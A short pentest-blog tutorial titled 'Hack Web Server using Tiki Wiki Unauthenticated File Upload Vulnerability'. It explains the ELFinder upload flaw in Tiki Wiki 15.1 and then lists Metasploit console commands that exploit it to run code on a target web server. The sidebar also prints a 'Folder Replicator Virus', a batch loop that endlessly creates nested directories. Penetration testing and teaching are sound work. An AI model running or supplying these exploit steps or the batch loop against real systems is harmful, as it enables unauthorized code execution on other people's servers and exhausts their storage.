Pages

  • Home
  • Author
skip to main | skip to sidebar

Hacking Articles|Raj Chandel's Blog

RSS Feed

Hack Web Server using Tiki Wiki Unauthenticated File Upload Vulnerability

at 8:03 AM Saturday, July 16, 2016
This module exploits a file upload vulnerability in Tiki Wiki <= 15.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user. The issue comes with one of the 3rd party components. Name of those components is ELFinder -version 2.0-. This component comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload PHP file. The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.

Exploit Targets
Tiki Wiki 15.1

Requirement
Attacker: kali Linux
Victim PC: Tiki Wiki 15.1


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/tikiwiki_upload_exec
msf exploit (tikiwiki_upload_exec)>set targeturi /kiki/
msf exploit (tikiwiki_upload_exec)>set rhost 192.168.0.11 (IP of Remote Host)
msf exploit (tikiwiki_upload_exec)>set rport 81
msf exploit (tikiwiki_upload_exec)>exploit          

Labels: Kali Linux, Penetration Testing

0 comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Labels

  • Batch File tricks (8)
  • crytography (3)
  • CTF (100)
  • Cyber Forensics Tools (56)
  • DLL Hacking (6)
  • footprinting (2)
  • Google Hacking (1)
  • Hacking Tools (12)
  • Kali Linux (370)
  • others (5)
  • Penetration Testing (1354)
  • redteam (9)
  • Stegnography (7)
  • Windows Hacking (6)

Popular Posts

  • 64-bit Linux Assembly and Shellcoding
    Introduction Shellcodes are machine instructions that are used as a payload in the exploitation of a vulnerability. An exploit is a small ...
  • GreatSct - An Application Whitelist Bypass Tool
    While wrting Applocker bypass series , we found a new tool which was especially design for bypassing whitelisting application.  So Idecid...
  • Active Directory Enumeration: ldeep
     
  • Credential Dumping with NetExec (nxc)
     
  • Folder Replicator Virus
    open notepad & type :loop md Virus cd Virus goto loop save as raj.bat
  • 4 Ways to get Linux Privilege Escalation
    When you exploit the victim pc there would be certain limits which resist performing some action even after you are having the shell of vi...
  • Android Reverse Engineering : See Source Code of Android Apps
    I am going to discuss how we can see the source code of the android apps and may be modify/hack according to our own convenience. Various a...
  • Hack Windows Password with the Help of Hiren's Boot CD
    Hiren’s BootCD is an ultimate solution to almost all your computer problems. It comes loaded with hell lot of tools.Each of them is powerful...
  • Privacy Protection Mobile – Graphene OS Setup
     
  • Netexec for Pentester: File Transfer
     
 

Copyright 2010 Hacking Articles|Raj Chandel's Blog. Theme zBench Bloggerized by Who Got Eliminated for Sports Master

Δ Top